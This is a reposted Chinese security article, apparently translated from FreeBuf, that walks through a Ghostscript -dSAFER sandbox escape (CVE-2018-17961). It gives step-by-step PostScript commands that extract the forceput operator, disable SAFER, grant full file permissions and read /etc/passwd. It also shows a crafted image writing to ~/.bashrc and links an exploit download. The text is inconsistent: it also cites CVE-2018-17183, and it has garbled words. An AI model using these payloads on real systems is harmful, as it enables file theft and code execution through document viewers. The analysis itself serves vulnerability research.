Ghostscript:基于漏洞CVE-2018-17961的-dSAFER沙盒逃逸技术

栏目: 编程工具 · 发布时间: 7年前

内容简介:今天给大家分析的是一种新型的本文提供的漏洞利用代码可以在最新的几个版本中正常运行,如果你想在evince、imagemagick、gimp或okular中查看代码的话,你还需要在~/.bashrc那里添加一行。因为nautilus将在没有任何用户交互的情况下自动调用evice-thumbnailer。如果你想触发这个漏洞的话,你只需要在运行了漏洞利用代码之后随便浏览一个网站就可以了。

前言

今天给大家分析的是一种新型的 ghostscript-dSAFER沙盒逃逸技术 ,目前这项技术仍然适用于当前正在使用的所有ghostscript版本。我不知道这个漏洞存在多久了,反正我是觉得已经很久了…

Ghostscript:基于漏洞CVE-2018-17961的-dSAFER沙盒逃逸技术

本文提供的漏洞利用代码可以在最新的几个版本中正常运行,如果你想在evince、imagemagick、gimp或okular中查看代码的话,你还需要在~/.bashrc那里添加一行。因为nautilus将在没有任何用户交互的情况下自动调用evice-thumbnailer。如果你想触发这个漏洞的话,你只需要在运行了漏洞利用代码之后随便浏览一个网站就可以了。

[email protected]:~$convert exploit.jpg output.jpg

[email protected]:~$tail -1 ~/.bashrc

echopwned by postscript

背景内容

Postscript的一个核心访问控制功能就是它能够标记可执行代码的运行过程,这样可以防止用户窥视系统程序的执行,并获取更强大的访问操作权限。为此,我专门设计了一个完整的漏洞利用代码,感兴趣的同学可以自行下载测试【 下载地址 】。

当你在 errordict 中安装了错误处理器之后,如果你终止了一个正在执行的操作进程,这样便会将错误操作符暴露给错误处理器。此时,,rrorerdict便会忽略-dSAFER沙箱,这也就是本文所利用的漏洞 CVE-2018-17183

漏洞利用细节

需要注意的是,这个漏洞目前还没有被完全修复,因为你现在仍然可以调用错误处理器,并触发错误,或者访问内部状态所保存的错误处理器。

其中一种漏洞利用方法为,找到能够终止运行的执行进程,触发一次异常,然后调用错误处理器并终止它的运行(可以通过/stackoverflow或/execoverflow来实现)。当出现故障时,操作码堆栈将会处于一种不一致的状态,因为ghostscript会尝试设置错误处理器,但这种设置是无效的。

漏洞利用方式

首先,用垃圾数据填充堆栈,只给错误处理器留下一小部分空间:

GS>01 300368 {} for

然后通过修改pdfopdict(改为非字典形式)来让/switch_to_normal_marking_ops发生错误:

GS<300369>/pdfopdict null def

调用/switch_to_normal_marking_ops(当前正在执行状态中):

GS<300369>GS_PDF_ProcSet/switch_to_normal_marking_ops get stopped

操作会失败,因为/typecheck正在写入pdfopdict:

GS<2>==
True

查看已保存堆栈中的最后几个元素:

GS<1>dupdup length 10 sub 10 getinterval ==
[300364300365 300366 300367 300368 null /m {normal_m} --.forceput-- /typecheck]

大家可以看到,错误的操作符已经准备传递给错误处理器了。

其中,forceput是一个非常强大的操作符,它可以忽略所有的访问控制,我们可以把它从堆栈中提取出来,然后用它来做我们想做的事情:

systemdict/SAFER false forceput
systemdict/userparams get /PermitFileControl [(*)] forceput
systemdict/userparams get /PermitFileWriting [(*)] forceput
systemdict/userparams get /PermitFileReading [(*)] forceput

结合之前所介绍的内容,我们看一看如何去读取/etc/passwd中的数据,下面给出的是一份DEMO:

$ gs-dSAFER -f test.ps
GPLGhostscript GIT PRERELEASE 9.26 (2018-09-13)
Copyright(C) 2018 Artifex Software, Inc.  Allrights reserved.
Thissoftware comes with NO WARRANTY: see the file PUBLIC for details.
(root:x:0:0:root:/root:/bin/bash)

漏洞利用代码

下载地址:【 点我下载

* 参考来源: mailclark ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM


以上所述就是小编给大家介绍的《Ghostscript:基于漏洞CVE-2018-17961的-dSAFER沙盒逃逸技术》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

世界是平的

世界是平的

[美] 托马斯·弗里德曼 / 何帆、肖莹莹、郝正非 / 湖南科学技术出版社 / 2006-11 / 56.00元

当学者们讨论世界这20年发展的历史,并把目光聚集在2000年到2004年3月这一段时间时,他们将说些什么?9·11恐怖袭击还是伊拉克战争?或者,他们将讨论:科技的汇集与传播使得印度、中国和许多发展中国家成为世界商品和服务产品供给链上的一员,从而为世界大的发展中国家中的中产阶级带来了大量的财富,使这两个国家在全球化浪潮中占据更有利的位置?随着世界变得平坦,我们必须以更快的速度前进,才能在竞争中赢得胜......一起来看看 《世界是平的》 这本书的介绍吧!

HTML 压缩/解压工具
HTML 压缩/解压工具

在线压缩/解压 HTML 代码

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试

HEX CMYK 转换工具
HEX CMYK 转换工具

HEX CMYK 互转工具